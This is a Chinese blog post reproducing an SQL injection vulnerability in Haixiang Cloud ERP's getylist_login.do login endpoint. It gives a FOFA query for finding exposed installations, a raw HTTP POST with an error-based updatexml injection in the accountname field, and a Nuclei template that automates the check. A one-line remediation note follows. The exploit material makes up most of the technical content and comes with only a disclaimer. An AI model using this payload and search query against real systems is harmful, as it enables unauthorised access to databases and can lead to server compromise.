【漏洞复现】海翔云ERP getylist_login 接口SQL注入漏洞

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量649 收藏 8
点赞数 18
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136533999
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

海翔云ERP,由成都海翔软件有限公司自主研发,拥有完全知识产权。 云ERP为企业提供 营销 + 财务 + 仓储 + 物流 整体解决方案;云ERP致力于在互联网背景下,为商贸公司提供企业级整体应用解决方案;云ERP更注重提供丰富的移动端应用,推动企业在互联网时代的经营升级

海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。

Ⅱ、fofa语句

body="checkMacWaitingSecond"

Ⅲ、漏洞复现

POC

POST /getylist_login.do HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--

1、发送数据包,执行sql语句

Ⅳ、Nuclei-POC

id: HaiXiang-ERP-getylist-login-SQL

info:
  name: 海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="checkMacWaitingSecond"
variables:
  filename: "{{to_lower(rand_base(5))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /getylist_login.do HTTP/1.1
        Host:{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0

        accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--


    matchers:
      - type: dsl
        dsl:
          -  contains_all(body,"e10adc3949ba59abbe56e057f20f883")

Ⅴ、修复建议

设置安全访问策略,过滤常见字符

Love Seed
关注
  • 18
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
海翔ERP getylist_login.do接口存在sql注入漏洞
nnn2188185的博客
03-09 97
海翔ERP getylist_login.do接口存在sql注入漏洞 附POC软件
海翔云ERP getylist_login 接口SQL注入
weixin_43567873的博客
03-10 40
海翔云ERP getylist_login 接口SQL注入
ERP系统常用SQL集锦
天狼岛
05-08 5643
http://www.erp100.com/forum.php?mod=viewthread&tid=80&extra=&authorid=8&page=1 查看关键用户 select distinct login_name   from (select c.user_name           as login_name,                d.full_name
海翔ERP getylist_login.do SQL注入漏洞
qq_39573664的博客
12-25 474
海翔ERPgetylist_login.do接口的accountname存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
海翔ERP getylist_login.do SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-18 27
海翔ERP getylist_login.do SQL注入漏洞(含批量验证poc)
Goby 漏洞更新 | 海翔云平台 getylist_login.do SQL 注入漏洞
m0_46699477的博客
05-12 175
seaflysoft 云平台一站式整体解决方案提供商,业务涵盖批发、连锁、零售行业ERP解决方案、wms仓储解决方案、电子商务、外勤、移动端(PDA、APP、小程序)解决方案。 系统getylist_login.do存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限
1day-明源云erp接口存在SQL注入漏洞
weixin_43167326的博客
04-16 865
明源云ERP产品旨在帮助企业实数字化、智能化的管理,提高企业运营效率和核心竞争力。该系统某接口存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
ERPNext SQL 注入漏洞
0xSec
12-05 870
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
erp.rar_C# ERP_C# winform_ERP 数据库_developer_sql developer
09-21
c#编写的汽车销售公司erp进销存系统,内涵sql数据库,含有第三方控件Developer Express WinForms Component Visual Studio 2003 v2.2.0。
ERP_sql.rar_ERP源码_ERP系统_delphi 3层ERP_三层
09-21
三层ERP系统源码, delphi sql
ssh--ERP-java.rar_ERP_erp ssh_erp系统 java_spring erp_ssh sqlserv
09-20
用Java实的一个ERP系统,使用了Struts /Spring/Hibernate三大框架,使用的是SQLServer数据库,里面有数据库文件,可以直接导入
erp.rar_ERP_ERP 系统 _ERP系统
09-14
一个ERP系统可以用来学习之用,做相应的程序的同学可以用来参考
erp.rar_ERP_ERP delphi_delphi ERP
09-23
管理软件系统全部字段规格信息结构表说明文件
数字时代网络安全即服务的兴起
网络研究观
06-11 537
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 192
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 939
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 584
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目
weixin_66578482的博客
06-10 859
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
华夏erp jsh_sequence
08-02
华夏ERP是一种企业资源规划(ERP)软件系统,可用于帮助企业管理各个部门和流程。而JSH_Sequence是华夏ERP中的一个功能模块。 JSH_Sequence(华夏-流水号)是一个用于生成自动流水号的功能模块。在企业运营过程中,流水号对于唯一标识和追踪各种业务操作非常重要。例如,销售订单、采购订单、入库单、出库单等都需要有独特的流水号。 使用JSH_Sequence模块,企业可以根据自己的需要,定义不同的流水号规则和格式。可以根据业务类型、日期、部门等来生成不同的流水号。这样,每个业务操作都能得到一个独一无二的流水号,方便管理和查询。 JSH_Sequence模块还提供了流水号的管理和监控功能。企业可以通过该模块,对已生成的流水号进行管理,包括修改、删除、查询等操作。同时,还可以进行流水号的监控,了解每个流水号的使用情况和历史记录。 通过华夏ERP的JSH_Sequence模块,企业可以实自动化、准确性和高效性的流水号管理。这不仅提高了企业的运营效率,减少了重劳动,还可以防止流水号的重和混淆。这对于企业的管理和分析都非常有益。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值